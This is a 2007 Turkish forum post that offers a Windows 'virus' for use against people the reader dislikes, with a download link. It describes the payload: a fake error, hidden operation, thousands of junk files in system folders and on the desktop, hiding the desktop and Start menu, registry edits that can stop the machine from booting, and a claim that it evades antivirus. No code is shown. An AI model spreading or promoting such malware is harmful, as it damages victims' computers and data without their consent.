Hallederizzzz
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Hallederizzzz

PortalliAnasayfaGaleriAramaLatest imagesKayıt OlGiriş yap

sewMEdiĞİNİZ kİŞiLer iÇin BİreBir :)

YazarMesaj
fm_matrak
Admin
Admin
fm_matrak

Erkek
Katıldığı Yer : ANKARA
Meslek : ÖĞRENCİ
Meşguliyeti : PC AND FUTBOL

sewMEdiĞİNİZ kİŞiLer iÇin BİreBir :) Empty
MesajKonu: sewMEdiĞİNİZ kİŞiLer iÇin BİreBir :)   sewMEdiĞİNİZ kİŞiLer iÇin BİreBir :) Icon_minitimePaz 18 Şub. 2007, 23:07

Arkadaşlar program virüs, yani virüs gibi birşey ben de tam anlayamadım ama yaptıkları yani işlevleri güzel... Program Açıldığı anda Virüs Devreye Giriyor ve uyduruktan bir hata mesajı veriyor..(Bu Program Sadece Linux Bilgisayarlarda Çalışır diye yazar mesajda) Daha sonra Program Kendini Gizliyor ve işlerini Gizli Yürütüyor.

Windows Yine Normal Olarak Çalışmaya Dewam Ediyor.Bu arada virüsümüz kendini C klasöründe , Windows Klasörüne , System Klasörüne , System32 klaösürüne , D sürücüsünde ve En Önemlisi Masaüstünde Her Biri 1 Kblık 5000 tane Dosya Oluşturuyor. (İlginç ve Saçma Gelebilir) Bunlar Olurken Windows Normal Bir Şekilde Çalışıyor. Kopyalam işlemi tamamlandıktan sonra Bir anda cdroom Açılıp Kapanıyor. Daha sonra masaüstü Gizleniyor ve Cdroom birdaha açılıp kapanıyor. Bu arada Bilgisayardan Beep Sesleri Geliyor. Daha sonra Başlat Menüsü Kayboluyor ve Bilgisayarın Ekranına Hiçbirşey Görünmüyor.

Sonra regedit kayıtları açılıyor ve yeni bölümüne basılıyor eğer kurban herhangi bir kayda basarsa regedite kayıt girmiş oluyor.Sonrasında Bir Hata mesajı daha geliyor ve Bilgisayarını Formatlaması gerektiği yazıyor.Eğer regedit bozulmuşsa bilgisayar açılmıyor bir daha eğer bozulmamışsa masaüstünde ve diğre yerlerdeki dosyalarla boğuşmaya başlıyor kurbanımız. İşte böyle gerçi saçma
görünebilir belki ama iş görür diye düsünuyorum.

Kendi Bilgisayarınızda Kesinlikle Açmayın.
Hiçbir Virüs Programına Takılmıyor.

http://rapidshare.de/files/3110439/SILWork.zip.html
https://hallederiz.hareketforum.net

sewMEdiĞİNİZ kİŞiLer iÇin BİreBir :)
1 sayfadaki 1 sayfası
 Similar topics
-